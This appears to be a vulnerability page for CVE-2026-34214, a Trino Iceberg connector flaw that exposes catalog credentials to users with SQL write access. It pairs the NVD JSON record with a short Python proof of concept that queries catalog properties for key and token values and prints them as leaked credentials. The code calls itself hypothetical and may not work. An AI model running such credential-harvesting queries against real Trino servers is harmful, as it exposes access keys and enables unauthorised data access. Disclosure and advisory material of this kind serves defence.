CVE-2026-34214

import trino # Connect to Trino server conn = trino.dbapi.connect( host='localhost', port=8080, user='attacker_with_write_access', catalog='iceberg', schema='default' ) cursor = conn.cursor() # Attempt to query system tables or properties that might leak credentials # Note: The exact query depends on the specific vulnerability exploitation path. # This is a conceptual PoC demonstrating the context. try: # Hypothetical query to access catalog properties or session info containing keys query = "SELECT * FROM system.metadata.catalog_properties WHERE property_name LIKE '%key%' OR property_name LIKE '%token%'" cursor.execute(query) rows = cursor.fetchall() for row in rows: print(f"Leaked Credential Info: {row}") except Exception as e: print(f"Exploitation attempt failed or query not applicable: {e}") cursor.close() conn.close()

{"cve": {"id": "CVE-2026-34214", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:18.400", "lastModified": "2026-04-06T16:53:34.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Trino is a distributed SQL query engine for big data analytics. From version 439 to before version 480, Iceberg connector REST catalog static credentials (access key) or vended credentials (temporary access key) are accessible to users that have write privilege on SQL level. This issue has been patched in version 480."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-212"}, {"lang": "en", "value": "CWE-312"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trino:trino:*:*:*:*:*:*:*:*", "versionStartIncluding": "439", "versionEndExcluding": "480", "matchCriteriaId": "03F5711B-7D03-4946-B983-27054B68A81A"}]}]}], "references": [{"url": "https://github.com/trinodb/trino/releases/tag/480", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/trinodb/trino/security/advisories/GHSA-x27p-5f68-m644", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}